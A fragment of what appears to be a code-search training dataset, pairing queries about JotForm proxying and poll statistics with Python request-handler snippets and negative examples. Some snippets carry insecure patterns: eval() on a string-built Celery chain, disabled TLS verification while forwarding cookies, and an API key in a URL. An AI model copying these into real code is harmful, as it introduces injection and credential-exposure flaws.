"def aci_app_proxy():\n if not g.user.is_authenticated: abort(401, \"Unauthorized\")\n if g.user.role != Roles.FULL_ADMIN: abort(403)\n \n # args can be provided via params or post data. If both are provided\n # then post data will be preferred\n is_json = False\n method = request.args.get(\"method\", \"get\").lower()\n url = request.args.get(\"url\", None)\n data = request.args.get(\"data\", {})\n params = request.args.get(\"params\", {})\n try:\n user_json = request.json\n if user_json is not None:\n if \"method\" in user_json: method = user_json[\"method\"]\n if \"url\" in user_json: url = user_json[\"url\"]\n if \"data\" in user_json: data = user_json[\"data\"]\n if \"params\" in user_json: params = user_json[\"params\"]\n except BadRequest as e: pass\n \n # force data from json and back to ensure it's properly formatted \n if data is not None and type(data) is not dict:\n try: data = json.loads(data)\n except Exception as e: abort(400, \"invalid value for 'data'\")\n data = json.dumps(data)\n # leave params as dict as required by requests methods\n if params is not None and type(params) is not dict:\n try: params = json.loads(params)\n except Exception as e: abort(400, \"invalid value for 'params'\")\n\n # validate url and methods\n if type(method) is not str and type(method) is not unicode:\n abort(400, \"invalid value for 'method'\")\n if url is None:\n abort(400, \"missing required attribute 'url'\")\n if type(url) is not str and type(url) is not unicode:\n abort(400, \"invalid value for 'url'\")\n if not re.search(\"^/\", url):\n abort(400, \"invalid value for 'url', must start with / character\") \n\n method = method.lower()\n url = \"%s%s\"%(current_app.config.get(\"PROXY_URL\", \"http://localhost\"),url)\n header = {}\n if \"/api/\" in url: \n header = {\"content-type\":\"application/json\"}\n is_json = True\n if method == \"get\":\n r = requests.get(url, verify=False, data=data, params=params,\n cookies=request.cookies,headers=header)\n elif method == \"post\":\n r = requests.post(url, verify=False, data=data, params=params,\n cookies=request.cookies,headers=header)\n elif method == \"delete\":\n r = requests.delete(url, verify=False, data=data, params=params,\n cookies=request.cookies,headers=header)\n else:\n abort(400, \"invalid value for 'method'\")\n \n if r.status_code != 200:\n # if json was provided in the status code with attribute error, \n # extract it and provide just the error text back to user\n text = r.text\n try: \n js = r.json()\n if \"error\" in js: text = js[\"error\"] \n except Exception as e: pass\n abort(r.status_code, text)\n if is_json:\n try: return jsonify(r.json())\n except Exception as e:\n r1 = re.search(\"https?://[^/]+(?P<clean>.*)\", r.url)\n if r1 is not None: clean = r1.group(\"clean\")\n else:clean = r.url\n abort(500, \"proxy to (%s)%s failed, received non-json reply\" % (\n method, clean))\n else:\n return make_response(r.text)",
"def post(self, request, *args, **kwargs):\n # # data['input_data'] = request.data['input_data']\n data = {}\n try:\n data['submission_name'] = request.data['submission_name']\n data['email'] = request.data['email']\n data['job'] = request.data['job']\n data['ip'] = get_ip(request)\n data['UUID'] = str(uuid.uuid1())\n except MultiValueDictKeyError:\n content = {'error': \"Input does not contain all required fields\"}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n # TODO : We could return a message specifying what is missing.\n\n # work out which job this refers to\n if Job.objects.filter(name=data['job']).exists():\n data['job'] = Job.objects.get(name=data['job']).pk\n else:\n content = {'error': 'Job name supplied does not exist'}\n return Response(content, status=status.HTTP_406_NOT_ACCEPTABLE)\n # TODO: VALIDATE input_data IN SOME MANNER\n submission_form = SubmissionForm(data, request.FILES)\n if submission_form.is_valid():\n s = submission_form.save()\n # Send to the Job Queue and set queued message if that is a success\n job = Job.objects.get(name=s.job)\n steps = job.steps.all().select_related('task').extra(order_by=['ordering'])\n # 1. Look up tasks in a job\n # 2. Order tasks by their step id\n total_steps = len(steps)-1\n current_step = 0\n chain = \"(\"\n for step in steps:\n chain += \"task_runner.si('%s','%i','%i','%i','%s') | \" % (s.UUID,\n step.ordering,\n current_step,\n total_steps,\n step.task.name)\n current_step += 1\n\n chain = chain[:-3]\n chain += ')()'\n try:\n eval(chain)\n except SyntaxError:\n print('Invalid string eval on: ' + chain)\n # 3. Build Celery chain\n # 4. Call delay on the Celery chain\n\n content = {'UUID': s.UUID, 'submission_name': s.submission_name}\n return Response(content, status=status.HTTP_201_CREATED)\n else:\n content = {'error': submission_form.errors}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)",
"def post(self, request, *args, **kwargs):\n form = self.get_form()\n if form.is_valid():\n recaptcha_response = request.POST.get('g-recaptcha-response')\n recaptcha_valid = self.validate_recaptcha(recaptcha_response)\n if recaptcha_valid:\n forwarded_to_salesforce = self.send_to_salesforce(request, form)\n if forwarded_to_salesforce:\n return self.form_valid(form)\n else:\n form.add_error(None, 'Server error. Please try again.')\n return self.form_invalid(form)\n else:\n form.add_error(None, 'Invalid captcha.')\n return self.form_invalid(form)\n else:\n return self.form_invalid(form)",
"def outputServerStub():\r\n data = request.form\r\n print(data)\r\n return jsonify(isError= False,\r\n message= \"Success\",\r\n statusCode= 200,\r\n data= data), 200",
"def generate_form_request_handler(header, text,\n on_form_valid=add_worker_to_roles,\n roles=[],\n django_form=ChooseWorkerForm,\n update_form=add_workers_to_choose_worker_form,\n finish_page=\"install_checklist\",\n svc_proxy=get_geppetto_web_service_client()):\n\n @login_required\n def handle_form(request):\n service = svc_proxy\n if (request.method == 'POST'):\n form = django_form(request.POST)\n update_form(form=form, service=service, roles=roles)\n if form.is_valid():\n on_form_valid_result = on_form_valid(form=form, \\\n service=service, roles=roles)\n if on_form_valid_result != None:\n return on_form_valid_result\n else:\n return redirect(finish_page)\n else:\n form = django_form()\n update_form(form=form, service=service, roles=roles)\n return render_to_response('ui/install_step.html',\n {'form': form, 'text': text, 'header': header},\n context_instance=RequestContext(request))\n return handle_form",
"def post(self):\n\n contenttype = self.request.headers['Content-Type']\n if contenttype == 'application/x-www-form':\n result, response = self.handle_request(self.request.get('message'))\n elif contenttype == 'text/json':\n result, response = self.handle_request(self.request.body)\n else:\n result, response = False, \"Invalid encoding: \" + contenttype \n\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(jenc().encode({'success': result, 'value': response}))",
"async def process_post(self, form: dict) -> str:\n\n logger = logging.getLogger(__name__)\n logger.debug('AgentRegistrar.process_post: >>> form: {}'.format(form))\n\n # Try dispatching to each ancestor from _BaseAgent first\n mro = AgentRegistrar._mro_dispatch()\n for ResponderClass in mro:\n try:\n rv = await ResponderClass.process_post(self, form)\n logger.debug('AgentRegistrar.process_post: <<< {}'.format(rv))\n return rv\n except TokenType:\n pass\n\n if form['type'] == 'agent-nym-send':\n # base listening agent code handles all proxied requests: it's agent-local, carry on\n await self.send_nym(\n form['data']['agent-nym']['did'],\n form['data']['agent-nym']['verkey'],\n form['data']['agent-nym'].get('alias', None))\n rv = json.dumps({})\n logger.debug('AgentRegistrar.process_post: <<< {}'.format(rv))\n return rv\n\n logger.debug('AgentRegistrar.process_post: <!< not this form type: {}'.format(form['type']))\n raise TokenType('{} does not support token type {}'.format(self.__class__.__name__, form['type']))",
"def post_method(form):\n return MethodStub(method.Post, form)",
"def make_request(self, response, *args, form=None, formdata=None, link_type, **kwargs):\n #print(\"In make_request\")\n meta = {'source_url': response.url, 'link_type': link_type}\n if form is None:\n assert formdata is None\n return response.follow(meta=meta, *args, **kwargs)\n else:\n assert formdata is not None\n # from https://github.com/scrapy/scrapy/blob/master/scrapy/http/request/form.py#L39\n # which does not allow us to pass an already-found lxml form Element, unfortunately\n kwargs.setdefault('encoding', response.encoding)\n formdata = scrapy_get_inputs(form, formdata,\n dont_click=None, clickdata=None, response=response)\n\n base_url = get_base_url(response)\n action = form.get('action')\n url = base_url if action is None else urljoin(base_url, strip_html5_whitespace(action))\n method = kwargs.pop('method', form.method)\n return FormRequest(url=url, formdata=formdata, method=method,\n meta=meta, *args, **kwargs)",
"def send_request(self):\n if self.redirect and self.req is None:\n fet(self.url).then(self.response_redirect).then(\n self.redirect_url).catch(lambda ev: self.on_error(ev.message))\n elif self.redirect is None and self.req is None:\n if self.response_type == \"json\":\n fet(self.url).then(self.response).then(lambda ev: self.on_response(\n Modif(ev))).catch(lambda ev: self.on_error(ev.message))\n else:\n fet(self.url).then(self.response).then(self.on_response).catch(\n lambda ev: self.on_error(ev.message))\n elif self.redirect is None and self.req:\n if self.response_type == \"json\":\n fet(self.req).then(self.response).then(lambda ev: self.on_response(\n Modif(ev))).catch(lambda ev: self.on_error(ev.message))\n else:\n fet(self.req).then(self.response).then(self.on_response).catch(\n lambda ev: self.on_error(ev.message))",
"def get_data(req):\n if len(req.form) == 0:\n return req.json\n return req.form",
"def luanize_post_sync():\n return jsonify(response(request.form[\"text\"]))",
"def do_POST(self):\n \n # Determine the post's content type.\n if self.headers.typeheader is None:\n content_type_header = self.headers.type\n else:\n content_type_header = self.headers.typeheader\n content_type, params = cgi.parse_header(content_type_header)\n # We only know how to handle form-data submissions.\n if content_type == \"multipart/form-data\":\n # Parse the form data.\n fields = cgi.parse_multipart(self.rfile, params) \n # For each field, take the first value, discarding others.\n # We don't support multi-valued fields.\n for name, value in fields.items():\n if len(value) == 1:\n fields[name] = value[0]\n # There may be additional query arguments in the URL, so\n # parse that too.\n script_url, url_fields = parse_url_query(self.path)\n # Merge query arguments from the form and from the URL.\n fields.update(url_fields)\n # Create and process a request.\n request = apply(WebRequest, (script_url, ), fields)\n # Store the client's IP address with the request.\n request.client_address = self.client_address[0]\n self.__HandleRequest(request)\n else:\n self.send_response(400,\n \"Unexpected request (POST of %s).\"\n % content_type)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Proxy form question requests Proxy the requests to get all the questions of a form to the JotForm API, return the responses verbatim. For more information on request and response formats,
|
async def proxy_get_questions(uuid: str):
credentials = redis.get(uuid)
if credentials is None:
raise HTTPError(401, "Unauthorised request.")
app_key, poll_id = credentials.decode("utf-8").split(
"-") # Get back user credentials.
reply = get(f"https://api.jotform.com/form/" + # Generate URL
f"{poll_id}/questions?apiKey={app_key}")
return Response(content=reply.content,
media_type=getattr(reply,"media_type", "application/json"))
|
[
"def do_answer():\n global nextQuestion, responses\n answer = request.form['answer']\n responses.append(answer)\n nextQuestion += 1\n if nextQuestion >= len(survey.questions):\n return redirect(\"/thanks\")\n return redirect(f\"/questions/{nextQuestion}\")",
"def __init__(self, question):\n self.question = question\n self.responses = []",
"async def _response_from_proxy(self, form: dict) -> 'Response':\n\n logger = logging.getLogger(__name__)\n logger.debug('_BaseAgent._response_from_proxy: >>> form: {}'.format(form))\n\n rv = None\n if (self.cfg.get('proxy-relay', False)) and ('proxy-did' in form['data']):\n proxy_did = form['data'].pop('proxy-did')\n if (proxy_did != self.did):\n endpoint = json.loads(await self.get_endpoint(proxy_did))\n if (('endpoint' not in endpoint) or\n not re.match(\n CONFIG_JSON_SCHEMA['agent']['properties']['endpoint']['pattern'],\n endpoint['endpoint'],\n re.IGNORECASE)):\n logger.debug('_BaseAgent._response_from_proxy: <!< no agent found for DID {}'.format(proxy_did))\n raise ProxyHop('No agent on the ledger has DID {}'.format(proxy_did))\n if re.match('^http[s]?://.*', endpoint['endpoint'], re.IGNORECASE):\n r = post(\n '{}/{}'.format(endpoint['endpoint'], form['type']),\n json=form) # requests module json-encodes\n if not r.ok:\n logger.debug('_BaseAgent._response_from_proxy: <!< proxy got HTTP {}'.format(r.status_code))\n raise HTTPError(r.status_code, r.reason)\n else:\n logger.debug('_BaseAgent._response_from_proxy: <!< cannot resolve proxy hop')\n raise ProxyHop(\n 'No proxy strategy implemented for target agent endpoint {}'.format(endpoint['endpoint']))\n rv = json.dumps(r.json()) # requests module json-decodes\n\n logger.debug('_BaseAgent._response_from_proxy: <<< {}'.format(rv))\n return rv",
"def question_list(request, format=None):\n if request.method == 'GET':\n questions = Question.objects.all()\n serializer = QuestionSerializer(questions, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = QuestionSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)",
"def answer_page():\n resps = session[\"responses\"]\n answer = request.form.get(\"answer\")\n resps.append(answer)\n session[\"responses\"] = resps\n num = len(session[\"responses\"])\n if num < len(satisfaction_survey.questions):\n return redirect(f\"/questions/{num}\")\n return redirect(\"/thanks\")",
"def test_get_specific_question(self):\n self.token = self.get_token()\n head = {'Content-Type': 'application/json', 'Authorization': 'JWT {}'.format(self.token)}\n\n self.test_client().post('/api/v1/questions', \\\n data=json.dumps(self.question), headers=head)\n\n question = self.test_client().get('/api/v1/questions/1', headers = head)\n self.assertEqual(question.status_code, 200)\n self.assertIn(\"How to create an api?\", str(question.data))",
"def quiz():\n if request.method == 'POST':\n # Cleanup our form data into something more manageable\n form_data = {k: v[0] for k, v in dict(request.form).iteritems()}\n tool_data, notes = choose_tools(form_data)\n return results(True, tool_data, notes)\n else:\n return render_template('quiz.html')",
"def question(request, id):\r\n q = Question.objects.get(pk = id)\r\n a = q.answer_set.filter(deleted = False).order_by('-created')[:20]\r\n if request.method == 'GET':\r\n aform = aforms.AnswerForm()\r\n payload = {'question':q, 'answers':a, 'aform':aform, }\r\n return render_to_response('moments/question.html', payload, RequestContext(request))",
"def view_edit_question(request):\n ###load the question number and test id###\n if 'user' not in request.session.keys() or 'teacher' not in request.session['user']['roles'] :\n return HTTPFound(location='/')\n \n test_id = int(request.GET[\"id\"])\n quesiton_num = 1\n try:\n question_num = int(request.GET[\"question\"])\n except:\n question_num = 1\n\n ###load the test and it's questions and their answers from the database###\n dbsession = DBSession()\n test = dbsession.query(Test).filter(Test.id==test_id).first()\n all_questions = dbsession.query(Question).filter(\n Question.test_id==test.id).all()\n total_questions = len(all_questions)\n for q in all_questions:\n if q.question_num == question_num:\n question = q\n\n post = request.POST\n if 'submit changes' in post:\n controls = post.items()\n parse_edit_form_data(controls, dbsession, question)\n location ='/edit_test?id='+str(test.id)\n return HTTPSeeOther(location=location)\n \n main = get_renderer('templates/master.pt').implementation()\n \n if (question.question_type == \"multipleChoice\" or\n question.question_type == \"selectTrue\"):\n all_answers = dbsession.query(Answer).filter(\n Answer.question_id==question.id).all()\n answers = []\n for answer in all_answers:\n answers.append({\"text\":answer.answer,'correct':answer.correct})\n schema = EditQuestionSchema()\n appstruct = {'text':(question.question),'answers':answers}\n if question.question_type == \"shortAnswer\":\n schema = EditShortAnswerQuestionSchema()\n appstruct = {'text':(question.question)}\n form = Form(schema, buttons=('submit changes',), \n use_ajax=True)\n form = form.render(appstruct)\n return {\"test\":test,'form':form, 'question': question, 'main': main}",
"def get(self):\n return get_all_questions()",
"async def process_post(self, form: dict) -> str:\n\n logger = logging.getLogger(__name__)\n logger.debug('_BaseAgent.process_post: >>> form: {}'.format(form))\n\n validate_form(form, self.cfg.get('proxy-relay', False))\n\n if form['type'] == 'agent-nym-lookup':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n rv = await self.get_nym(form['data']['agent-nym']['did'])\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] == 'agent-endpoint-lookup':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n rv = await self.get_endpoint(form['data']['agent-endpoint']['did'])\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] == 'agent-endpoint-send':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n resp_json = await self.send_endpoint()\n rv = json.dumps({})\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] == 'schema-lookup':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n s_key = schema_key_for(form['data']['schema'])\n schema_json = await self.get_schema(s_key)\n schema = json.loads(schema_json)\n if not schema:\n rv = schema_json\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n rv = schema_json\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] in (\n 'agent-nym-send',\n 'schema-send',\n 'claim-def-send',\n 'claim-offer-create',\n 'claim-offer-store',\n 'claim-create',\n 'claim-store',\n 'claim-request',\n 'proof-request',\n 'proof-request-by-referent',\n 'verification-request'): # do not proxy: master-secret-set, claims-reset\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n # base listening agent doesn't do this work\n logger.debug('_BaseAgent.process_post: <!< not this form type: {}'.format(form['type']))\n raise TokenType('{} does not respond to token type {}'.format(self.__class__.__name__, form['type']))\n\n logger.debug('_BaseAgent.process_post: <!< not this form type: {}'.format(form['type']))\n raise TokenType('{} does not support token type {}'.format(self.__class__.__name__, form['type']))",
"def form(self):\n return self.question.form_class(question=self.question)",
"def question(request):\n\n # first check if we should be showing the results page instead\n # (if they have answered all the questions)\n if 'show_results' in request.COOKIES.keys() and (\n request.COOKIES['show_results'] == 'yes'):\n return show_results(request)\n\n current_q = None\n visitor = None\n new_visitor = False\n\n if request.method == 'POST':\n # The user has submitted an answer to a question.\n # Get User ID\n if 'visitor' in request.COOKIES.keys():\n visitor = Visitor.objects.get(id=request.COOKIES['visitor'])\n else: # if this is a new visitor\n visitor = Visitor()\n visitor.save()\n new_visitor = True\n\n is_yes = request.POST.get(\"yesno\") == 'yes'\n is_skip = request.POST.get(\"yesno\") not in (\"yes\", \"no\")\n current_q = Question.objects.get(\n id=request.POST.get(\"qnumber\"))\n if not Answer.objects.filter(\n question=current_q.id, visitor=visitor\n ).exists() and not is_skip:\n # The user has not answered this question yet. Count the response.\n answer = Answer(yes=is_yes, question=current_q, visitor=visitor)\n answer.save()\n\n question = get_next_question(current_q.id if current_q else 0)\n if question:\n # Display the new question to the user.\n question_number = get_question_number(question.id)\n question_total = get_question_total()\n context = {\n 'question': question,\n 'percent_no': get_percent_no(question),\n 'question_number': question_number,\n 'question_total': question_total,\n }\n response = render(request, 'question.html', context)\n if new_visitor:\n response.set_cookie(\"visitor\", visitor.id)\n return response\n\n else:\n # We have iterated through all questions.\n # Set a cookie for question completion and display the results page.\n response = show_results(request)\n response.set_cookie('show_results', 'yes')\n if new_visitor:\n response.set_cookie(\"visitor\", visitor.id)\n return response",
"def form_response_list(formId):\n from ..main import app\n form = Form.objects.only(\"formOptions\", \"cff_permissions\").get({\"_id\":ObjectId(formId)})\n # todo: use search framework, don't return all!\n query = app.current_request.query_params and app.current_request.query_params.get(\"query\", None)\n autocomplete = app.current_request.query_params and app.current_request.query_params.get(\"autocomplete\", None)\n search_by_id = app.current_request.query_params and app.current_request.query_params.get(\"search_by_id\", None)\n show_unpaid = app.current_request.query_params and app.current_request.query_params.get(\"show_unpaid\", None)\n if query:\n # autocomplete, participant name, assign bibs functionality\n app.check_permissions(form, [\"Responses_View\", \"Responses_CheckIn\"])\n search_fields = get(form.formOptions.dataOptions, \"search.searchFields\", [\"_id\"])\n if search_by_id is not None:\n search_fields = [\"_id\"]\n result_limit = get(form.formOptions.dataOptions, \"search.resultLimit\", 10)\n result_fields = get(form.formOptions.dataOptions, \"search.resultFields\", [\"_id\"])\n autocomplete_fields = get(form.formOptions.dataOptions, \"search.autocompleteFields\", [\"_id\"])\n if show_unpaid is not None:\n default_mongo_query = {\"paid\": False}\n else:\n default_mongo_query = {\"paid\": True}\n mongo_query = {\"$or\": []}\n for word in query.split(\" \"):\n for field in search_fields:\n if field == \"_id\":\n if len(word) <= 24:\n try:\n queryObjectIdStart = ObjectId(word + \"0\" * (24 - len(word))) # fill in zeroes to create object id, e.g. 5cba --> 5cba0000000000000000000\n queryObjectIdEnd = ObjectId(word + \"e\" * (24 - len(word)))\n mongo_query[\"$or\"].append({field: {\"$gte\": queryObjectIdStart, \"$lte\": queryObjectIdEnd} })\n except bson.errors.InvalidId:\n pass\n else:\n if field.startswith(\"value.participants.\"):\n _, subfield = field.split(\"value.participants.\")\n mongo_query[\"$or\"].append({\"value.participants\": {\n \"$elemMatch\": {\n subfield: {\n \"$regex\": '^' + word, \"$options\" : \"i\"\n }\n }\n }\n })\n else:\n mongo_query[\"$or\"].append({field: {\"$regex\": '^' + word, \"$options\" : \"i\"}})\n mongo_query[\"form\"] = form.id\n if len(mongo_query[\"$or\"]) == 0:\n del mongo_query[\"$or\"]\n # Default query paid = True\n if mongo_query:\n mongo_query = {\"$and\": [default_mongo_query, mongo_query]}\n else:\n mongo_query = default_mongo_query\n if autocomplete is not None:\n projection = {field: 1 for field in autocomplete_fields}\n result_limit = 5\n else:\n projection = {}\n for field in result_fields:\n projection[field] = 1\n responses = Response.objects.raw(mongo_query).limit(result_limit).project(projection)\n else:\n app.check_permissions(form, [\"Responses_View\"])\n responses = Response.objects.all()._collection.find({\"form\": form.id}, {\"value\": 1, \"_id\": 1, \"amount_paid\": 1, \"user\": 1, \"form\": 1, \"paymentInfo\": 1, \"date_created\": 1, \"date_modified\": 1, \"paid\": 1, \"counter\": 1})\n return {\"res\": [r for r in json.loads(dumps(responses))] }\n return {\"res\": [serialize_model(r) for r in responses]}",
"def test():\n session['responses'] = []\n return redirect(url_for('questions', num=0))",
"def view_question(request):\n if authenticated_userid(request) == None or 'user' not in request.session.keys():\n return HTTPFound(location='/')\n main = get_renderer('templates/master.pt').implementation()\n ###load the question number and test id###\n test_id = int(request.GET[\"id\"])\n quesiton_num = 1\n try:\n question_num = int(request.GET[\"question\"])\n except:\n question_num = 1\n\n ###load the test and it's questions and their answers from the database###\n dbsession = DBSession()\n test = dbsession.query(Test).filter(Test.id==test_id).first()\n if attempts_remaining(dbsession, test.id, request.session['user']['name']) <= 0:\n return HTTPFound(location='/') #if no more attempts left\n if (test.start_time - datetime.datetime.now()) > (datetime.timedelta(0)):\n return HTTPFound(location='/') #if it's too early to take\n if (test.end_time - datetime.datetime.now()) < (datetime.timedelta(0)):\n return HTTPFound(location='/') #if it's too late to take\n all_questions = dbsession.query(Question).filter(\n Question.test_id==test.id).all()\n total_questions = len(all_questions)\n for q in all_questions:\n \n if q.question_num == question_num:\n question = q\n\n ###create \"current_test\" in the session object###\n session = request.session\n user_choice = ''\n if \"current_test\" not in session.keys() or (\n session[\"current_test\"][\"name\"] != test.name):\n session[\"current_test\"] = {\"name\": test.name}\n\n ###load any previously selected answer to this question###\n if str(question_num) in session['current_test'].keys():\n user_choice = session['current_test'][str(question_num)]\n\n ###check if a question was submited and put the answer in the session###\n post = request.POST\n if 'review test' in post or 'next question' in post:\n controls = post.items()\n answer = \"na\"\n i = 0\n if question.question_type == \"shortAnswer\":\n for control in controls:\n if control[0] == 'answer':\n answer = str(control[1])\n if question.question_type == \"multipleChoice\":\n for control in controls:\n if control[0] == 'deformField1':\n answer = str(control[1])\n if question.question_type == \"selectTrue\":\n answer = []\n for control in controls:\n if control[0] == 'checkbox':\n answer.append(control[1])\n session[\"current_test\"][str(question_num)]=answer \n #store selected answer\n if 'next question' in post:\n return HTTPFound(location='/question?id='+str(test.id)+\n ';question='+str(question_num+1))\n if 'review test' in post: #check if it was the last question\n #if so redirect to the test's submit page\n return HTTPFound(location='/test?id='+str(test.id))\n\n ###create the question's form###\n if question.question_type == \"multipleChoice\":\n schema = create_multiple_choice_form(question, \n dbsession, user_choice)\n if question.question_type == \"selectTrue\":\n schema = create_select_all_form(question,\n dbsession, user_choice)\n if question.question_type == \"shortAnswer\":\n schema = create_short_answer_form(question, \n dbsession, user_choice)\n if question_num == total_questions: #check if this is the last question\n form = deform.Form(schema[0],\n buttons=('review test',))\n else:\n form = deform.Form(schema[0],\n buttons=('next question',))\n if question.question_type == \"shortAnswer\":\n return {\"test\":test,'form':form.render(schema[1]),\n 'link':'/test?id='+str(test.id), 'main': main} #if it's a short answer question (returns default value)\n return {\"test\":test,'form':form.render(), 'link':'/test?id='+str(test.id), 'main': main}",
"def dns_response_answers(self, questions):\n records = b''\n for question in questions:\n name = str(b'.'.join(question['name']), encoding='UTF-8')\n# print(name)\n if name == \"updates.paloaltonetworks.com\":\n IP = updates\n elif name == \"downloads.paloaltonetworks.com\":\n IP = downloads\n elif name == \"s0000.urlcloud.paloaltonetworks.com\":\n IP = urlcloud\n elif name == \"dns.service.paloaltonetworks.com\":\n IP = dnsservice\n else:\n IP = default\n# print (IP)\n \n record = b''\n for label in question['name']:\n # Length octet\n record += bytes([len(label)])\n record += label\n # Zero length octet\n record += b'\\x00'\n # TYPE - just copy QTYPE\n # TODO QTYPE values set is superset of TYPE values set, handle different QTYPEs, see RFC 1035 3.2.3.\n record += question['qtype']\n # CLASS - just copy QCLASS\n # TODO QCLASS values set is superset of CLASS values set, handle at least * QCLASS, see RFC 1035 3.2.5.\n record += question['qclass']\n # TTL - 32 bit unsigned integer. Set to 0 to inform, that response\n # should not be cached.\n record += b'\\x00\\x00\\x00\\x00'\n # RDLENGTH - 16 bit unsigned integer, length of RDATA field.\n # In case of QTYPE=A and QCLASS=IN, RDLENGTH=4.\n record += b'\\x00\\x04'\n # RDATA - in case of QTYPE=A and QCLASS=IN, it's IPv4 address.\n record += b''.join(map(\n lambda x: bytes([int(x)]),\n IP.split('.')\n ))\n records += record\n return records",
"def getReplyResults():",
"def test_get_all_questions(self):\n self.token = self.get_token()\n head = {'Content-Type': 'application/json', 'Authorization': 'JWT {}'.format(self.token)}\n\n res = self.test_client().post('/api/v1/questions',\\\n data=json.dumps(self.question), headers=head)\n\n self.assertEqual(res.status_code, 201)\n\n all_questions = self.test_client().get('/api/v1/questions', \\\n headers = head)\n\n self.assertEqual(all_questions.status_code, 200)\n self.assertEqual('application/json', all_questions.content_type)\n self.assertIn(\"How to create an api?\", all_questions.data)\n\n cursor = CONNECTION.cursor()\n cursor.execute('SELECT * FROM questions;')\n questions = cursor.fetchall()\n cursor.close()\n self.assertIn(questions[0][1], all_questions.data)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Get the poll stats. Fetch all the answers from the JotForm API and convert them to cumilative statistics.
|
async def get_poll_stats(uuid: str):
credentials = redis.get(uuid)
if credentials is None:
raise HTTPError(401, "Unauthorised request.")
app_key, poll_id = credentials.decode("utf-8").split(
"-") # Get back user credentials.
submissions = get_submissions(poll_id, app_key)
# We now have form submissions with us.
question_ids = get_question_ids(app_key, poll_id) # And the question IDs.
counts = jsonable_encoder(get_answer_stats(submissions, question_ids))
return JSONResponse(counts)
|
[
"def get_results(poll):\n\n assert poll is not None, \"Invalid poll: None\"\n\n if not poll['closed']:\n return None\n\n results = {}\n\n # Get cached results\n results_db = get_entries('results', 'poll', poll['uid'])\n\n # If no cache, compute the results and store them\n if len(results_db) == 0:\n ballots = get_entries('ballots', 'poll', poll['uid'])\n\n # If no ballots provide, no results\n if len(ballots) == 0:\n return None\n\n # Number of ballots cast\n ballots_count = len(ballots) / len(poll['choices'])\n\n # Build data structures\n choices = {}\n results = {}\n for choice in poll['choices']:\n choices[choice['id']] = {'votes': [0] * 7}\n results[choice['id']] = {'ballots': ballots_count}\n\n # Count the number of vote for each grade for each choice\n for ballot in ballots:\n choices[ballot['choice']]['votes'][ballot['grade']] += 1\n\n # Store the count in percentage for display purposes\n for choice in choices:\n results[choice]['percentages'] = []\n for vote in choices[choice]['votes']:\n results[choice]['percentages'].append(100 * vote / ballots_count)\n\n # Transfrom the number of vote to a list of votes\n for _, choice in choices.items():\n votes = []\n for i in range(len(choice['votes'])):\n votes.extend([i] * choice['votes'][i])\n choice['votes'] = votes\n\n # Compute the median, the number of better and worse vote.\n for _, choice in choices.items():\n choice_compute(choice)\n\n # Apply the grade for each choice\n for choice in choices:\n if choices[choice]['median'] == 0:\n results[choice]['grade'] = \"To reject\"\n elif choices[choice]['median'] == 1:\n results[choice]['grade'] = \"Poor\"\n elif choices[choice]['median'] == 2:\n results[choice]['grade'] = \"Acceptable\"\n elif choices[choice]['median'] == 3:\n results[choice]['grade'] = \"Fair\"\n elif choices[choice]['median'] == 4:\n results[choice]['grade'] = \"Good\"\n elif choices[choice]['median'] == 5:\n results[choice]['grade'] = \"Very Good\"\n elif choices[choice]['median'] == 6:\n results[choice]['grade'] = \"Excellent\"\n\n if choices[choice]['better'] > choices[choice]['worse']:\n results[choice]['grade'] += \"+\"\n else:\n results[choice]['grade'] += \"-\"\n\n # Sort the vote to etablish the ranks\n ranks = rank_choices(choices, ballots_count)\n for choice in results:\n results[choice]['rank'] = ranks[choice]\n\n\n # Store the results\n results_db = []\n for choice, result in results.items():\n results_db.append((poll['uid'], choice, \";\".join([str(rank) for rank in result['rank']]) if isinstance(result['rank'], list) else str(result['rank']), result['grade'], \";\".join([str(percentage) for percentage in result['percentages']]), result['ballots']))\n\n get_db().executemany(\"INSERT INTO results (poll, choice, rank, grade, percentages, ballots) VALUES (?, ?, ?, ?, ?, ?)\", results_db)\n\n # Destroy the ballots\n get_db().execute('DELETE FROM ballots WHERE poll = ?', [poll['uid']])\n\n else:\n for result in results_db:\n results[result['choice']] = {'rank' : int(result['rank']) if ';' not in result['rank'] else [int(vote) for vote in result['rank'].split(';')], 'grade': result['grade'], 'percentages': [int(percentage) for percentage in result['percentages'].split(';')], 'ballots': result['ballots']}\n\n return results",
